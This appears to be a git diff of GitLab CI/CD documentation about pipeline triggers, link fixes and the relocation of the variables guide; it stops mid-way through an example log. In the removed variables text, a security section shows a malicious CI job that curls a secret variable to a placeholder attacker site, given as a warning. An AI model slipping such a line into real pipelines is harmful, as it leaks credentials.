+ +By using cURL you can trigger a pipeline rerun with minimal effort, for example: + +```shell +curl --request POST \ + --form token=TOKEN \ + --form ref=main \ + "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" +``` + +In this case, the pipeline for the project with ID `9` runs on the `main` branch. + +Alternatively, you can pass the `token` and `ref` arguments in the query string: + +```shell +curl --request POST \ + "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline?token=TOKEN&ref=main" +``` + +You can also benefit by using triggers in your `.gitlab-ci.yml`. Let's say that +you have two projects, A and B, and you want to trigger a pipeline on the `main` +branch of project B whenever a tag on project A is created. This is the job you +need to add in project A's `.gitlab-ci.yml`: + +```yaml +trigger_pipeline: + stage: deploy + script: + - 'curl --request POST --form token=TOKEN --form ref=main "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline"' + rules: + - if: $CI_COMMIT_TAG +``` + +This means that whenever a new tag is pushed on project A, the job runs and the +`trigger_pipeline` job is executed, triggering the pipeline for project B. The +`stage: deploy` ensures that this job runs only after all jobs with +`stage: test` complete successfully. + +## Triggering a pipeline from a webhook + +To trigger a job from a webhook of another project you need to add the following +webhook URL for Push and Tag events (change the project ID, ref and token): + +```plaintext +https://gitlab.example.com/api/v4/projects/9/ref/main/trigger/pipeline?token=TOKEN +``` + +You should pass `ref` as part of the URL, to take precedence over `ref` from +the webhook body that designates the branch ref that fired the trigger in the +source repository. Be sure to URL-encode `ref` if it contains slashes. + +### Using webhook payload in the triggered pipeline + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/31197) in GitLab 13.9. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/321027) in GitLab 13.11. + +If you trigger a pipeline by using a webhook, you can access the webhook payload with +the `TRIGGER_PAYLOAD` [predefined CI/CD variable](../variables/predefined_variables.md). +The payload is exposed as a [file-type variable](../variables/index.md#cicd-variable-types), +so you can access the data with `cat $TRIGGER_PAYLOAD` or a similar command. + +## Making use of trigger variables + +You can pass any number of arbitrary variables in the trigger API call and they +are available in GitLab CI/CD so that they can be used in your `.gitlab-ci.yml` +file. The parameter is of the form: + +```plaintext +variables[key]=value +``` + +This information is also exposed in the UI. Please note that _values_ are only viewable by Owners and Maintainers. + + + +Using trigger variables can be proven useful for a variety of reasons: + +- Identifiable jobs. Since the variable is exposed in the UI you can know + why the pipeline was triggered if you pass a variable that explains the + purpose. +- Conditional job processing. You can have conditional jobs that run whenever + a certain variable is present. + +Consider the following `.gitlab-ci.yml` where we set three +[stages](../yaml/index.md#stages) and the `upload_package` job is run only +when all jobs from the test and build stages pass. When the `UPLOAD_TO_S3` +variable is non-zero, `make upload` is run. + +```yaml +stages: + - test + - build + - package + +run_tests: + stage: test + script: + - make test + +build_package: + stage: build + script: + - make build + +upload_package: + stage: package + script: + - if [ -n "${UPLOAD_TO_S3}" ]; then make upload; fi +``` + +You can then trigger a pipeline while you pass the `UPLOAD_TO_S3` variable +and the script of the `upload_package` job is run: + +```shell +curl --request POST \ + --form token=TOKEN \ + --form ref=main \ + --form "variables[UPLOAD_TO_S3]=true" \ + "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" +``` + +Trigger variables have the [highest priority](../variables/index.md#cicd-variable-precedence) +of all types of variables. + +## Using cron to trigger nightly pipelines + +Whether you craft a script or just run cURL directly, you can trigger jobs +in conjunction with cron. The example below triggers a job on the `main` branch +of project with ID `9` every night at `00:30`: + +```shell +30 0 * * * curl --request POST --form token=TOKEN --form ref=main "https://gitlab.example.com/api/v4/projects/9/trigger/pipeline" +``` + +This behavior can also be achieved through the GitLab UI with +[pipeline schedules](../pipelines/schedules.md). + +## Legacy triggers + +Old triggers, created before GitLab 9.0 are marked as legacy. + +Triggers with the legacy label do not have an associated user and only have +access to the current project. They are considered deprecated and might be +removed with one of the future versions of GitLab. + +## Troubleshooting + +### '404 not found' when triggering a pipeline + +A response of `{"message":"404 Not Found"}` when triggering a pipeline might be caused +by using a Personal Access Token instead of a trigger token. [Add a new trigger](#adding-a-new-trigger) +and use that token to authenticate when triggering a pipeline. diff --git a/doc/ci/troubleshooting.md b/doc/ci/troubleshooting.md index 24a37900e6a..df9b20d1708 100644 --- a/doc/ci/troubleshooting.md +++ b/doc/ci/troubleshooting.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# Troubleshooting CI/CD +# Troubleshooting CI/CD **(FREE)** GitLab provides several tools to help make troubleshooting your pipelines easier. @@ -43,34 +43,34 @@ pipeline, and what their values are. A lot of pipeline configuration is dependen on variables, and verifying them is one of the fastest ways to find the source of a problem. -[Export the full list of variables](variables/README.md#list-all-environment-variables) +[Export the full list of variables](variables/index.md#list-all-environment-variables) available in each problematic job. Check if the variables you expect are present, and check if their values are what you expect. ## GitLab CI/CD documentation -The [complete `gitlab-ci.yml` reference](yaml/README.md) contains a full list of +The [complete `gitlab-ci.yml` reference](yaml/index.md) contains a full list of every keyword you may need to use to configure your pipelines. -You can also look at a large number of pipeline configuration [examples](examples/README.md) -and [templates](examples/README.md#cicd-templates). +You can also look at a large number of pipeline configuration [examples](examples/index.md) +and [templates](examples/index.md#cicd-templates). ### Documentation for pipeline types Some pipeline types have their own detailed usage guides that you should read if you are using that type: -- [Multi-project pipelines](multi_project_pipelines.md): Have your pipeline trigger +- [Multi-project pipelines](pipelines/multi_project_pipelines.md): Have your pipeline trigger a pipeline in a different project. -- [Parent/child pipelines](parent_child_pipelines.md): Have your main pipeline trigger +- [Parent/child pipelines](pipelines/parent_child_pipelines.md): Have your main pipeline trigger and run separate pipelines in the same project. You can also - [dynamically generate the child pipeline's configuration](parent_child_pipelines.md#dynamic-child-pipelines) + [dynamically generate the child pipeline's configuration](pipelines/parent_child_pipelines.md#dynamic-child-pipelines) at runtime. -- [Pipelines for Merge Requests](merge_request_pipelines/index.md): Run a pipeline +- [Pipelines for Merge Requests](pipelines/merge_request_pipelines.md): Run a pipeline in the context of a merge request. - - [Pipelines for Merge Results](merge_request_pipelines/pipelines_for_merged_results/index.md): + - [Pipelines for Merge Results](pipelines/pipelines_for_merged_results.md): Pipelines for merge requests that run on the combined source and target branch - - [Merge Trains](merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md): + - [Merge Trains](pipelines/merge_trains.md): Multiple pipelines for merged results that queue and run automatically before changes are merged. @@ -80,7 +80,7 @@ There are troubleshooting guides available for some CI/CD features and related t - [Container Registry](../user/packages/container_registry/index.md#troubleshooting-the-gitlab-container-registry) - [GitLab Runner](https://docs.gitlab.com/runner/faq/) -- [Merge Trains](merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md#troubleshooting) +- [Merge Trains](pipelines/merge_trains.md#troubleshooting) - [Docker Build](docker/using_docker_build.md#troubleshooting) - [Environments](environments/deployment_safety.md#ensure-only-one-deployment-job-runs-at-a-time) @@ -105,7 +105,7 @@ If a pipeline does not seem to run at all, with no error message, it may also be due to `rules` or `only/except` configuration, or the `workflow: rules` keyword. If you are converting from `only/except` to the `rules` keyword, you should check -the [`rules` configuration details](yaml/README.md#rules) carefully. The behavior +the [`rules` configuration details](yaml/index.md#rules) carefully. The behavior of `only/except` and `rules` is different and can cause unexpected behavior when migrating between the two. @@ -123,8 +123,8 @@ This is usually caused by the `rules` configuration, and there are several ways #### A job is not in the pipeline -GitLab determines if a job is added to a pipeline based on the [`only/except`](yaml/README.md#only--except) -or [`rules`](yaml/README.md#rules) defined for the job. If it didn't run, it's probably +GitLab determines if a job is added to a pipeline based on the [`only/except`](yaml/index.md#only--except) +or [`rules`](yaml/index.md#rules) defined for the job. If it didn't run, it's probably not evaluating as you expect. #### No pipeline or the wrong type of pipeline runs @@ -141,7 +141,7 @@ be checked to make sure the jobs are added to the correct pipeline type. For example, if a merge request pipeline did not run, the jobs may have been added to a branch pipeline instead. -It's also possible that your [`workflow: rules`](yaml/README.md#workflow) configuration +It's also possible that your [`workflow: rules`](yaml/index.md#workflow) configuration blocked the pipeline, or allowed the wrong pipeline type. ### A job runs unexpectedly @@ -150,8 +150,8 @@ A common reason a job is added to a pipeline unexpectedly is because the `change keyword always evaluates to true in certain cases. For example, `changes` is always true in certain pipeline types, including scheduled pipelines and pipelines for tags. -The `changes` keyword is used in combination with [`only/except`](yaml/README.md#onlychanges--exceptchanges) -or [`rules`](yaml/README.md#ruleschanges)). It's recommended to use `changes` with +The `changes` keyword is used in combination with [`only/except`](yaml/index.md#onlychanges--exceptchanges) +or [`rules`](yaml/index.md#ruleschanges)). It's recommended to use `changes` with `rules` or `only/except` configuration that ensures the job is only added to branch pipelines or merge request pipelines. @@ -170,8 +170,8 @@ a branch to its remote repository. To illustrate the problem, suppose you've had This is because the previous pipeline cannot find a checkout-SHA (which is associated with the pipeline record) from the `example` branch that the commit history has already been overwritten by the force-push. -Similarly, [Pipelines for merged results](merge_request_pipelines/pipelines_for_merged_results/index.md) -might have failed intermittently due to [the same reason](merge_request_pipelines/pipelines_for_merged_results/index.md#intermittently-pipelines-fail-by-fatal-reference-is-not-a-tree-error). +Similarly, [Pipelines for merged results](pipelines/pipelines_for_merged_results.md) +might have failed intermittently due to [the same reason](pipelines/pipelines_for_merged_results.md#intermittently-pipelines-fail-by-fatal-reference-is-not-a-tree-error). As of GitLab 12.4, we've improved this behavior by persisting pipeline refs exclusively. To illustrate its life cycle: @@ -211,7 +211,7 @@ is displayed. If the pipeline is still running, the **Merge** button is replaced with the **Merge when pipeline succeeds** button. -If [**Merge Trains**](merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md) +If [**Merge Trains**](pipelines/merge_trains.md) are enabled, the button is either **Add to merge train** or **Add to merge train when pipeline succeeds**. **(PREMIUM)** #### "A CI/CD pipeline must run and be successful before merge" message @@ -224,9 +224,9 @@ should disable **Pipelines must succeed** so you can accept merge requests. ### "The pipeline for this merge request did not complete. Push a new commit to fix the failure or check the troubleshooting documentation to see other possible actions." message -This message is shown if the [merge request pipeline](merge_request_pipelines/index.md), -[merged results pipeline](merge_request_pipelines/pipelines_for_merged_results/index.md), -or [merge train pipeline](merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md) +This message is shown if the [merge request pipeline](pipelines/merge_request_pipelines.md), +[merged results pipeline](pipelines/pipelines_for_merged_results.md), +or [merge train pipeline](pipelines/merge_trains.md) has failed or been canceled. If a merge request pipeline or merged result pipeline was canceled or failed, you can: @@ -249,17 +249,17 @@ If the merge train pipeline was canceled before the merge request was merged, wi Pipeline configuration warnings are shown when you: -- [Validate configuration with the CI Lint tool](yaml/README.md). +- [Validate configuration with the CI Lint tool](yaml/index.md). - [Manually run a pipeline](pipelines/index.md#run-a-pipeline-manually). ### "Job may allow multiple pipelines to run for a single action" warning -When you use [`rules`](yaml/README.md#rules) with a `when:` clause without an `if:` +When you use [`rules`](yaml/index.md#rules) with a `when:` clause without an `if:` clause, multiple pipelines may run. Usually this occurs when you push a commit to a branch that has an open merge request associated with it. To [prevent duplicate pipelines](jobs/job_control.md#avoid-duplicate-pipelines), use -[`workflow: rules`](yaml/README.md#workflow) or rewrite your rules to control +[`workflow: rules`](yaml/index.md#workflow) or rewrite your rules to control which pipelines can run. ### Console workaround if job using resource_group gets stuck diff --git a/doc/ci/unit_test_reports.md b/doc/ci/unit_test_reports.md index 7b5f6b5167d..f845c79ef45 100644 --- a/doc/ci/unit_test_reports.md +++ b/doc/ci/unit_test_reports.md @@ -40,8 +40,8 @@ Consider the following workflow: ## How it works -First, GitLab Runner uploads all [JUnit report format XML files](https://www.ibm.com/support/knowledgecenter/en/SSQ2R2_14.1.0/com.ibm.rsar.analysis.codereview.cobol.doc/topics/cac_useresults_junit.html) -as [artifacts](yaml/README.md#artifactsreportsjunit) to GitLab. Then, when you visit a merge request, GitLab starts +First, GitLab Runner uploads all [JUnit report format XML files](https://www.ibm.com/docs/en/adfz/developer-for-zos/14.1.0?topic=formats-junit-xml-format) +as [artifacts](yaml/index.md#artifactsreportsjunit) to GitLab. Then, when you visit a merge request, GitLab starts comparing the head and base branch's JUnit report format XML files, where: - The base branch is the target branch (usually the default branch). @@ -77,7 +77,7 @@ If a test failed in the project's default branch in the last 14 days, a message ## How to set it up To enable the Unit test reports in merge requests, you need to add -[`artifacts:reports:junit`](yaml/README.md#artifactsreportsjunit) +[`artifacts:reports:junit`](yaml/index.md#artifactsreportsjunit) in `.gitlab-ci.yml`, and specify the path(s) of the generated test reports. The reports must be `.xml` files, otherwise [GitLab returns an Error 500](https://gitlab.com/gitlab-org/gitlab/-/issues/216575). @@ -87,8 +87,8 @@ XML reports are stored in GitLab as artifacts and their results are shown in the merge request widget. To make the Unit test report output files browsable, include them with the -[`artifacts:paths`](yaml/README.md#artifactspaths) keyword as well, as shown in the [Ruby example](#ruby-example). -To upload the report even if the job fails (for example if the tests do not pass), use the [`artifacts:when:always`](yaml/README.md#artifactswhen) +[`artifacts:paths`](yaml/index.md#artifactspaths) keyword as well, as shown in the [Ruby example](#ruby-example). +To upload the report even if the job fails (for example if the tests do not pass), use the [`artifacts:when:always`](yaml/index.md#artifactswhen) keyword. You cannot have multiple tests with the same name and class in your JUnit report format XML file. @@ -350,12 +350,17 @@ If parsing JUnit report XML results in an error, an indicator is shown next to t  +NOTE: +GitLab.com has a 500,000 [test case parsing limit](../user/gitlab_com/#gitlab-cicd). Self-managed administrators can manage this setting on their instance. + +GitLab does not parse very [large nodes](https://nokogiri.org/tutorials/parsing_an_html_xml_document.html#parse-options) of JUnit reports. There is [an issue](https://gitlab.com/gitlab-org/gitlab/-/issues/268035) open to make this optional. + ## Viewing JUnit screenshots on GitLab > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/202114) in GitLab 13.0 behind the `:junit_pipeline_screenshots_view` feature flag, disabled by default. > - The feature flag was removed and was [made generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/216979) in GitLab 13.12. -Upload your screenshots as [artifacts](yaml/README.md#artifactsreportsjunit) to GitLab. If JUnit +Upload your screenshots as [artifacts](yaml/index.md#artifactsreportsjunit) to GitLab. If JUnit report format XML files contain an `attachment` tag, GitLab parses the attachment. Note that: - The `attachment` tag **must** contain the relative path to `$CI_PROJECT_DIR` of the screenshots you uploaded. For @@ -368,7 +373,7 @@ report format XML files contain an `attachment` tag, GitLab parses the attachmen ``` - You should set the job that uploads the screenshot to - [`artifacts:when: always`](yaml/README.md#artifactswhen) so that it still uploads a screenshot + [`artifacts:when: always`](yaml/index.md#artifactswhen) so that it still uploads a screenshot when a test fails. A link to the test case attachment appears in the test case details in diff --git a/doc/ci/variables/README.md b/doc/ci/variables/README.md index 1db2d0dd888..5ab8653dc35 100644 --- a/doc/ci/variables/README.md +++ b/doc/ci/variables/README.md @@ -1,815 +1,8 @@ --- -stage: Verify -group: Pipeline Authoring -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: reference +redirect_to: 'index.md' --- -# GitLab CI/CD variables **(FREE)** +This document was moved to [another location](index.md). -CI/CD variables are a type of environment variable. You can use them to: - -- Control the behavior of jobs and [pipelines](../pipelines/index.md). -- Store values you want to re-use. -- Avoid hard-coding values in your `.gitlab-ci.yml` file. - -You can use [predefined CI/CD variables](#predefined-cicd-variables) or define custom: - -- [Variables in the `.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). -- [Project CI/CD variables](#add-a-cicd-variable-to-a-project). -- [Group CI/CD variables](#add-a-cicd-variable-to-a-group). -- [Instance CI/CD variables](#add-a-cicd-variable-to-an-instance). - -> For more information about advanced use of GitLab CI/CD: -> -> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Get to productivity faster with these [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/) -> shared by GitLab engineers. -> - <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Learn how the Cloud Native Computing Foundation (CNCF) [eliminates the complexity](https://about.gitlab.com/customers/cncf/) -> of managing projects across many cloud providers with GitLab CI/CD. - -## Predefined CI/CD variables - -GitLab CI/CD has a [default set of predefined CI/CD variables](predefined_variables.md) -you can use in pipelines configuration and job scripts. - -### Use predefined CI/CD variables - -You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. - -This example shows how to output a job's stage by using the `CI_JOB_STAGE` -predefined variable: - -```yaml -test_variable: - stage: test - script: - - echo "$CI_JOB_STAGE" -``` - -The script outputs the `stage` for the `test_variable`, which is `test`: - - - -## Custom CI/CD variables - -You can create custom CI/CD variables: - -- For a project: - - [In the project's `.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). - - [In the project's settings](#add-a-cicd-variable-to-a-project). - - [With the API](../../api/project_level_variables.md). -- For all projects in a group [in the group's setting](#add-a-cicd-variable-to-a-group). -- For all projects in a GitLab instance [in the instance's settings](#add-a-cicd-variable-to-an-instance). - -You can [override variable values manually for a specific pipeline](../jobs/index.md#specifying-variables-when-running-manual-jobs), -or have them [prefilled in manual pipelines](../pipelines/index.md#prefill-variables-in-manual-pipelines). - -There are two types of variables: [`File` or `Variable`](#cicd-variable-types). - -Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/index.html) -to execute scripts. Each shell has its own set of reserved variable names. - -Make sure each variable is defined for the [scope you want to use it in](where_variables_can_be_used.md). - -### Create a custom CI/CD variable in the `.gitlab-ci.yml` file - -To create a custom variable in the [`.gitlab-ci.yml`](../yaml/README.md#variables) file, -define the variable and value with `variables` keyword. - -You can use the `variables` keyword in a job or at the top level of the `.gitlab-ci.yml` file. -If the variable is at the top level, it's globally available and all jobs can use it. -If it's defined in a job, only that job can use it. - -```yaml -variables: - TEST_VAR: "All jobs can use this variable's value" - -job1: - variables: - TEST_VAR_JOB: "Only job1 can use this variable's value" - script: - - echo "$TEST_VAR" and "$TEST_VAR_JOB" -``` - -Variables saved in the `.gitlab-ci.yml` file should store only non-sensitive project -configuration, like a `RAILS_ENV` or `DATABASE_URL` variable. These variables are -visible in the repository. Store sensitive variables containing secrets, keys, and so on -in project settings. - -Variables saved in the `.gitlab-ci.yml` file are also available in [service containers](../docker/using_docker_images.md). - -If you don't want globally defined variables to be available in a job, set `variables` -to `{}`: - -```yaml -job1: - variables: {} - script: - - echo This job does not need any variables -``` - -You can use variables to help define other variables. Use `$$` to ignore a variable -name inside another variable: - -```yaml -variables: - FLAGS: '-al' - LS_CMD: 'ls "$FLAGS" $$TMP_DIR' -script: - - 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR' -``` - -Use the [`value` and `description`](../yaml/README.md#prefill-variables-in-manual-pipelines) -keywords to define [variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines) -for [manually-triggered pipelines](../pipelines/index.md#run-a-pipeline-manually). - -### Add a CI/CD variable to a project - -You can add CI/CD variables to a project's settings. Only project members with the -[Maintainer role](../../user/permissions.md#project-members-permissions) -can add or update project CI/CD variables. To keep a CI/CD variable secret, put it -in the project settings, not in the `.gitlab-ci.yml` file. - -To add or update variables in the project settings: - -1. Go to your project's **Settings > CI/CD** and expand the **Variables** section. -1. Select the **Add Variable** button and fill in the details: - - - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - - **Value**: No limitations. - - **Type**: [`File` or `Variable`](#cicd-variable-types). - - **Environment scope**: (Optional) `All`, or specific [environments](../environments/index.md). - - **Protect variable** (Optional): If selected, the variable is only available - in pipelines that run on protected branches or tags. - - **Mask variable** (Optional): If selected, the variable's **Value** is masked - in job logs. The variable fails to save if the value does not meet the - [masking requirements](#mask-a-cicd-variable). - -After you create a variable, you can use it in the `.gitlab-ci.yml` file: - -```yaml -test_variable: - stage: test - script: - - echo "$CI_JOB_STAGE" # calls a predefined variable - - echo "$TEST" # calls a custom variable of type `env_var` - - echo "$GREETING" # calls a custom variable of type `file` that contains the path to the temp file - - cat "$GREETING" # the temp file itself contains the variable value -``` - -The output is: - - - -### Add a CI/CD variable to a group - -> Support for [environment scopes](https://gitlab.com/gitlab-org/gitlab/-/issues/2874) added to GitLab Premium in 13.11 - -To make a CI/CD variable available to all projects in a group, define a group CI/CD variable. - -Use group variables to store secrets like passwords, SSH keys, and credentials, if you: - -- Do **not** use an external key store. -- Use the GitLab [integration with HashiCorp Vault](../secrets/index.md). - -To add a group variable: - -1. In the group, go to **Settings > CI/CD**. -1. Select the **Add Variable** button and fill in the details: - - - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - - **Value**: No limitations. - - **Type**: [`File` or `Variable`](#cicd-variable-types). - - **Environment scope** (Optional): `All`, or specific [environments](#limit-the-environment-scope-of-a-cicd-variable). **(PREMIUM)** - - **Protect variable** (Optional): If selected, the variable is only available - in pipelines that run on protected branches or tags. - - **Mask variable** (Optional): If selected, the variable's **Value** is masked - in job logs. The variable fails to save if the value does not meet the - [masking requirements](#mask-a-cicd-variable). - -#### View all group-level variables available in a project - -To view all the group-level variables available in a project: - -1. In the project, go to **Settings > CI/CD**. -1. Expand the **Variables** section. - -Variables from [subgroups](../../user/group/subgroups/index.md) are recursively -inherited. - - - -### Add a CI/CD variable to an instance **(FREE SELF)** - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14108) in GitLab 13.0. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/299879) in GitLab 13.11. - -To make a CI/CD variable available to all projects and groups in a GitLab instance, -add an instance CI/CD variable. You must have the [Administrator role](../../user/permissions.md). - -You can define instance variables via the UI or [API](../../api/instance_level_ci_variables.md). - -To add an instance variable: - -1. On the top bar, select **Menu >** **{admin}** **Admin**. -1. On the left sidebar, select **Settings > CI/CD** and expand the **Variables** section. -1. Select the **Add variable** button, and fill in the details: - - - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - - **Value**: [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/220028), - 10,000 characters is allowed. This is also bounded by the limits of the selected - runner operating system. In GitLab 13.0 to 13.2, 700 characters is allowed. - - **Type**: [`File` or `Variable`](#cicd-variable-types). - - **Protect variable** (Optional): If selected, the variable is only available - in pipelines that run on protected branches or tags. - - **Mask variable** (Optional): If selected, the variable's **Value** is not shown - in job logs. The variable is not saved if the value does not meet the [masking requirements](#mask-a-cicd-variable). - -### CI/CD variable types - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/46806) in GitLab 11.11. - -All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file -are `Variable` type. Project, group and instance CI/CD variables can be `Variable` -or `File` type. - -`Variable` type variables: - -- Consist of a key and value pair. -- Are made available in jobs as environment variables, with: - - The CI/CD variable key as the environment variable name. - - The CI/CD variable value as the environment variable value. - -Use `File` type CI/CD variables for tools that need a file as input. - -`File` type variables: - -- Consist of a key, value and file. -- Are made available in jobs as environment variables, with - - The CI/CD variable key as the environment variable name. - - The CI/CD variable value saved to a temporary file. - - The path to the temporary file as the environment variable value. - -Some tools like [the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) -and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) -use `File` type variables for configuration. - -For example, if you have the following variables: - -- A variable of type `Variable`: `KUBE_URL` with the value `https://example.com`. -- A variable of type `File`: `KUBE_CA_PEM` with a certificate as the value. - -Use the variables in a job script like this: - -```shell -kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" -``` - -An alternative to `File` type variables is to: - -- Read the value of a CI/CD variable (`variable` type). -- Save the value in a file. -- Use that file in your script. - -```shell -# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file -echo "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem" -# Pass the newly created file to kubectl -kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem" -``` - -### Mask a CI/CD variable - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784) in GitLab 11.10 - -You can mask a project, group, or instance CI/CD variable so the value of the variable -does not display in job logs. - -To mask a variable: - -1. In the project, group, or Admin Area, go to **Settings > CI/CD**. -1. Expand the **Variables** section. -1. Next to the variable you want to protect, select **Edit**. -1. Select the **Mask variable** check box. -1. Select **Update variable**. - -The value of the variable must: - -- Be a single line. -- Be 8 characters or longer, consisting only of: - - Characters from the Base64 alphabet (RFC4648). - - The `@` and `:` characters ([In GitLab 12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/63043) and later). - - The `.` character ([In GitLab 12.10](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/29022) and later). - - The `~` character ([In GitLab 13.12](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/61517) and later). -- Not match the name of an existing predefined or custom CI/CD variable. - -### Protect a CI/CD variable - -You can protect a project, group or instance CI/CD variable so it is only passed -to pipelines running on [protected branches](../../user/project/protected_branches.md) -or [protected tags](../../user/project/protected_tags.md). - -To protect a variable: - -1. Go to **Settings > CI/CD** in the project, group or instance admin area. -1. Expand the **Variables** section. -1. Next to the variable you want to protect, select **Edit**. -1. Select the **Protect variable** check box. -1. Select **Update variable**. - -The variable is available for all subsequent pipelines. - -### CI/CD variable security - -Malicious code pushed to your `.gitlab-ci.yml` file could compromise your variables -and send them to a third party server regardless of the masked setting. If the pipeline -runs on a [protected branch](../../user/project/protected_branches.md) or -[protected tag](../../user/project/protected_tags.md), malicious code can compromise protected variables. - -Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you: - -- [Run a pipeline in the parent project for a merge request submitted from a forked project](../merge_request_pipelines/index.md#run-pipelines-in-the-parent-project-for-merge-requests-from-a-forked-project). -- Merge the changes. - -The following example shows malicious code in a `.gitlab-ci.yml` file: - -```yaml -build: - script: - - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" -``` - -Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) -and stored in the database. This data can only be read and decrypted with a -valid [secrets file](../../raketasks/backup_restore.md#when-the-secrets-file-is-lost). - -### Custom variables validated by GitLab - -Some variables are listed in the UI so you can choose them more quickly. - -| Variable | Allowed Values | Introduced in | -|-------------------------|----------------------------------------------------|---------------| -| `AWS_ACCESS_KEY_ID` | Any | 12.10 | -| `AWS_DEFAULT_REGION` | Any | 12.10 | -| `AWS_SECRET_ACCESS_KEY` | Any | 12.10 | - -WARNING: -When you store credentials, there are [security implications](#cicd-variable-security). -If you use AWS keys for example, follow the [Best practices for managing AWS access keys](https://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html). - -## Use CI/CD variables in job scripts - -All CI/CD variables are set as environment variables in the job's environment. -You can use variables in job scripts with the standard formatting for each environment's -shell. - -To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/). - -### Use variables with Bash, `sh` and similar - -To access environment variables in Bash, `sh`, and similar shells, prefix the -CI/CD variable with (`$`): - -```yaml -job_name: - script: - - echo "$CI_JOB_ID" -``` - -### Use variables with PowerShell - -To access variables in a Windows PowerShell environment, including environment -variables set by the system, prefix the variable name with (`$env:`) or (`$`): - -```yaml -job_name: - script: - - echo $env:CI_JOB_ID - - echo $CI_JOB_ID - - echo $env:PATH -``` - -In [some cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820) -environment variables might need to be surrounded by quotes to expand properly: - -```yaml -job_name: - script: - - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test -``` - -### Use variables with Windows Batch - -To access CI/CD variables in Windows Batch, surround the variable -with `%`: - -```yaml -job_name: - script: - - echo %CI_JOB_ID% -``` - -You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html). -Delayed expansion might be needed for variables that contain white spaces or newlines. - -```yaml -job_name: - script: - - echo !ERROR_MESSAGE! -``` - -### List all environment variables - -You can list all environment variables available to a script with the `export` command -in Bash or `dir env:` in PowerShell. This exposes the values of **all** available -variables, which can be a [security risk](#cicd-variable-security). -[Masked variables](#mask-a-cicd-variable) display as `[masked]`. - -For example: - -```yaml -job_name: - script: - - export - # - 'dir env:' # Use this for PowerShell -``` - -Example job log output: - -```shell -export CI_JOB_ID="50" -export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a" -export CI_COMMIT_SHORT_SHA="1ecfd275" -export CI_COMMIT_REF_NAME="main" -export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git" -export CI_COMMIT_TAG="1.0.0" -export CI_JOB_NAME="spec:other" -export CI_JOB_STAGE="test" -export CI_JOB_MANUAL="true" -export CI_JOB_TRIGGERED="true" -export CI_JOB_TOKEN="[masked]" -export CI_PIPELINE_ID="1000" -export CI_PIPELINE_IID="10" -export CI_PAGES_DOMAIN="gitlab.io" -export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss" -export CI_PROJECT_ID="34" -export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss" -export CI_PROJECT_NAME="gitlab-foss" -export CI_PROJECT_TITLE="GitLab FOSS" -export CI_PROJECT_NAMESPACE="gitlab-org" -export CI_PROJECT_ROOT_NAMESPACE="gitlab-org" -export CI_PROJECT_PATH="gitlab-org/gitlab-foss" -export CI_PROJECT_URL="https://example.com/gitlab-org/gitlab-foss" -export CI_REGISTRY="registry.example.com" -export CI_REGISTRY_IMAGE="registry.example.com/gitlab-org/gitlab-foss" -export CI_REGISTRY_USER="gitlab-ci-token" -export CI_REGISTRY_PASSWORD="[masked]" -export CI_RUNNER_ID="10" -export CI_RUNNER_DESCRIPTION="my runner" -export 